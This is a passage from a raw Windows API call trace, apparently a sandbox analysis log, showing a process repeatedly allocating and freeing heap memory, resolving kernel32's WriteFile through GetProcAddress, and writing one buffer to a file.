Size=0x4) returned 0x8e1b50 [0170.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0170.653] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0170.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0170.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0170.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0170.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b50 [0170.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0170.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0170.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0170.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0170.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1960 [0170.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0170.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0170.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0170.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0170.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0170.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0170.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0170.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0170.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0170.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0170.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0170.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0170.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0170.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0170.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0170.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0170.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0170.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b60 [0170.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0170.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0170.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0170.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18f0 [0170.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0170.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda08 [0170.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0170.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0170.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0170.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0170.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0170.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0170.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0170.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0170.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0170.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0170.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0170.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0170.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0170.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0170.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0170.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0170.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0170.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0170.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0170.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0170.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0170.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0170.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0170.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0170.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0170.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0170.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0170.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0170.656] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0170.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0170.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0170.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0170.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0170.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0170.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0170.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0170.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0170.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0170.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0170.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0170.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0170.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0170.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0170.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0170.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0170.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0170.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0170.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0170.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0170.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0170.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0170.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0170.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0170.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0170.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0170.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0170.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0170.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0170.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0170.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0170.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0170.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0170.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0170.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0170.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0170.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0170.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0170.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0170.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0170.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0170.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0170.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0170.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0170.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0170.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0170.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0170.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0170.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0170.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0170.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0170.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0170.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0170.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0170.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0170.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0170.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0170.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0170.658] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0170.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0170.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0170.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0170.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0170.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0170.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0170.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0170.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0170.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0170.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0170.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0170.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0170.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0170.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0170.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0170.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0170.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0170.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0170.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0170.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0170.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0170.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0170.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0170.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0170.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0170.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0170.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0170.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0170.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0170.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0170.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0170.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0170.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0170.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0170.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0170.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0170.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0170.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0170.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0170.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0170.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0170.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0170.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0170.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0170.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0170.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0170.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0170.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0170.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0170.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0170.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0170.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0170.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0170.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0170.661] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0170.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0170.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0170.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0170.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bd360 [0170.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd360, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0170.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0170.662] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0170.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0170.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0170.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0170.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0170.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0170.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0170.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0170.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0170.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0170.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0170.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0170.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0170.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0170.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0170.662] WriteFile (in: hFile=0x120, lpBuffer=0xa6b008*, nNumberOfBytesToWrite=0xa915, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0xa6b008*, lpNumberOfBytesWritten=0x87eae0*=0xa915, lpOverlapped=0x0) returned 1 [0170.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0170.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0170.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0170.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0170.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0170.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0170.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0170.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0170.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0170.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0170.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0170.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0170.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0170.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0170.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0170.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0170.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0170.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0170.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0170.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0170.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0170.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0170.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0170.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0170.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0170.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0170.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0170.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0170.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0170.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0170.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0170.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0170.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0170.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0170.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0170.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0170.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0170.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0170.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0170.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0170.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0170.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 